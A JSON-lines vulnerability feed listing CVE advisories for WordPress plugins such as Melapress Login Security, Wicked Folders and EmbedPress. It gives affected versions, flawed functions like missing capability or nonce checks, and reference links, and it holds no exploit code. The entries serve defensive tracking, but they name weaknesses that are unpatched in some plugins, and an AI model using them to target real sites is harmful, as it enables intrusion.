{"CVE_ID":"CVE-2025-6895","slug":"melapress-login-security","description":"The Melapress Login Security plugin for WordPress is vulnerable to Authentication Bypass due to missing authorization within the get_valid_user_based_on_token() function in versions 2.1.0 to 2.1.1. This makes it possible for unauthenticated attackers who know an arbitrary user meta value to bypass authentication checks and log in as that user.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/class-melapress-login-security.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/class-melapress-login-security.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/modules\\\/temporary-logins\\\/class-temporary-logins.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/melapress-login-security\\\/tags\\\/2.1.1\\\/app\\\/modules\\\/temporary-logins\\\/class-temporary-logins.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/melapress-login-security\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/melapress-login-security\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f65d5c4-6f53-4836-9130-c9f4ed3be893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f65d5c4-6f53-4836-9130-c9f4ed3be893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0712","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_move_object function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be428ae-40ae-4cc0-82ad-d121b6d2d27e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be428ae-40ae-4cc0-82ad-d121b6d2d27e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0505","slug":"ever-compare","versionImpact":"1.2.3","description":"The Ever Compare WordPress plugin through 1.2.3 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbabff3e-b021-49ed-aaf3-b73a77d4b354\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbabff3e-b021-49ed-aaf3-b73a77d4b354\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45831","slug":"amp-wp","versionImpact":"1.5.15","description":"Cross-Site Request Forgery (CSRF) vulnerability in Pixelative, Mohsin Rafique AMP WP \u2013 Google AMP For WordPress plugin <=\u00a01.5.15 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/amp-wp\\\/wordpress-amp-wp-google-amp-for-wordpress-plugin-1-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/amp-wp\\\/wordpress-amp-wp-google-amp-for-wordpress-plugin-1-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5532","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6. This is due to missing or incorrect nonce validation on the 'imgmap_save_area_title' function. This makes it possible for unauthenticated attackers to update the post title and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb67f02-87e8-4ca3-8a9d-6663a700ab5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb67f02-87e8-4ca3-8a9d-6663a700ab5b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L894\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L894\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1349","slug":"embedpress","versionImpact":"3.9.8","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631d200f-7b0b-4105-b91e-030af459ba99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631d200f-7b0b-4105-b91e-030af459ba99?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0449","slug":"artibot","versionImpact":"1.1.6","description":"The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L52\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7410","slug":"my-custom-css","versionImpact":"3.3","description":"The My Custom CSS PHP & ADS plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.3. This is due the plugin not preventing direct access to the \/my-custom-css\/vendor\/mobiledetect\/mobiledetectlib\/export\/exportToJSON.php file and and the file displaying\/generating the full path. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d145d0af-e364-4cc3-af4f-03117eb34637?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d145d0af-e364-4cc3-af4f-03117eb34637?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-custom-css\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-custom-css\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9271","slug":"rewp","versionImpact":"1.0.1","description":"The Re:WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7d340b9-6a77-481c-983c-f4774ecff285?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7d340b9-6a77-481c-983c-f4774ecff285?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rewp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rewp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161983\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161983\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9627","slug":"green-wp-telegram-bot-by-teplitsa","versionImpact":"1.3","description":"The TeploBot - Telegram Bot for WP plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'service_process' function in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to view the Telegram Bot Token, which is a secret token to control the bot.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-wp-telegram-bot-by-teplitsa\\\/trunk\\\/inc\\\/core.php?rev=1754863#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-wp-telegram-bot-by-teplitsa\\\/trunk\\\/inc\\\/core.php?rev=1754863#L266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10853","slug":"buy-one-click-woocommerce","versionImpact":"2.2.9","description":"The Buy one click WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the removeorder AJAX action in all versions up to, and including, 2.2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete Buy one click WooCommerce orders.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad73f105-fea8-4bbe-946b-97e61b4b9e57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad73f105-fea8-4bbe-946b-97e61b4b9e57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11082","slug":"tumult-hype-animations","versionImpact":"1.9.15","description":"The Tumult Hype Animations plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the hypeanimations_panel() function in all versions up to, and including, 1.9.15. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/tumult\\\/hype-wordpress-plugin\\\/commit\\\/1702d3d4fd0fae9cb9fc40cdfc3dfb8584d5f04c\",\"name\":\"https:\\\/\\\/github.com\\\/tumult\\\/hype-wordpress-plugin\\\/commit\\\/1702d3d4fd0fae9cb9fc40cdfc3dfb8584d5f04c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tumult-hype-animations\\\/trunk\\\/includes\\\/adminpanel.php#L277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tumult-hype-animations\\\/trunk\\\/includes\\\/adminpanel.php#L277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197761\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197761\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tumult-hype-animations\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tumult-hype-animations\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3a0b4b-cce5-4d78-99d5-697f2cf04427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3a0b4b-cce5-4d78-99d5-697f2cf04427?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12279","slug":"wp-fb-autoconnect","versionImpact":"4.6.2","description":"The WP Social AutoConnect plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211577\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211577\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-fb-autoconnect\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-fb-autoconnect\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/392d8286-a5fd-4d5d-9f6a-f13564013edc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/392d8286-a5fd-4d5d-9f6a-f13564013edc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13650","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.34","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'PAFE Before After Image Comparison Slider' widget in all versions up to, and including, 2.4.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e3d0ffd-209b-4e29-bc1d-91f2498b4632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e3d0ffd-209b-4e29-bc1d-91f2498b4632?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47658","slug":"elex-helpdesk-customer-support-ticket-system","versionImpact":"3.2.7","description":"Unrestricted Upload of File with Dangerous Type vulnerability in ELEXtensions ELEX WordPress HelpDesk & Customer Ticketing System allows Upload a Web Shell to a Web Server. This issue affects ELEX WordPress HelpDesk & Customer Ticketing System: from n\/a through 3.2.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/elex-helpdesk-customer-support-ticket-system\\\/vulnerability\\\/wordpress-elex-wordpress-helpdesk-customer-ticketing-system-3-2-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/elex-helpdesk-customer-support-ticket-system\\\/vulnerability\\\/wordpress-elex-wordpress-helpdesk-customer-ticketing-system-3-2-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8104","slug":"wp-memory","versionImpact":"3.98","description":"The Memory Usage plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.98. This is due to missing nonce validation in the wpmemory_install_plugin() function. This makes it possible for unauthenticated attackers to silently install one of the several whitelisted plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-memory\\\/tags\\\/3.98\\\/wpmemory.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-memory\\\/tags\\\/3.98\\\/wpmemory.php#L376\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333316\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333316\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-memory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-memory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaf06b2-9ac3-4882-9212-fdcecdc5fb8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaf06b2-9ac3-4882-9212-fdcecdc5fb8c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0726","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_edit_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b88442-3961-42e2-8ff4-7726819a7f0f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b88442-3961-42e2-8ff4-7726819a7f0f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5507","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'imagemap' shortcode in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6e687e9-6ffe-4457-8d57-3c03f657eb74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6e687e9-6ffe-4457-8d57-3c03f657eb74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L402\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L402\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7089","slug":"easy-svg-image-allow","versionImpact":"1.0","description":"The Easy SVG Allow WordPress plugin through 1.0 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b8ba734-7764-4ab6-a7e2-8de55bd46bed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b8ba734-7764-4ab6-a7e2-8de55bd46bed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1340","slug":"login-lockdown","versionImpact":"2.08","description":"The Login Lockdown \u2013 Protect Login Form plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the generate_export_file function in all versions up to, and including, 2.08. This makes it possible for authenticated attackers, with subscriber access and higher, to export this plugin's settings that include whitelisted IP addresses as well as a global unlock key. With the global unlock key an attacker can add their IP address to the whitelist.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/functions.php#L492\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/functions.php#L492\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0447","slug":"artibot","versionImpact":"1.1.6","description":"The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848f36de-c62a-45ee-b259-46dab73e4439?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848f36de-c62a-45ee-b259-46dab73e4439?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L60\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1897","slug":"new-grid-gallery","versionImpact":"1.4.3","description":"The Grid Gallery \u2013 Photo Image Grid Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.3 via deserialization via shortcode of untrusted input from the awl_gg_settings_ meta value. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f5777b-38b0-4fc6-909d-61eaa1de6173?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f5777b-38b0-4fc6-909d-61eaa1de6173?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-grid-gallery\\\/tags\\\/1.4.0\\\/grid-gallery-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-grid-gallery\\\/tags\\\/1.4.0\\\/grid-gallery-shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7382","slug":"linkify-text","versionImpact":"1.9.1","description":"The Linkify Text plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.9.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 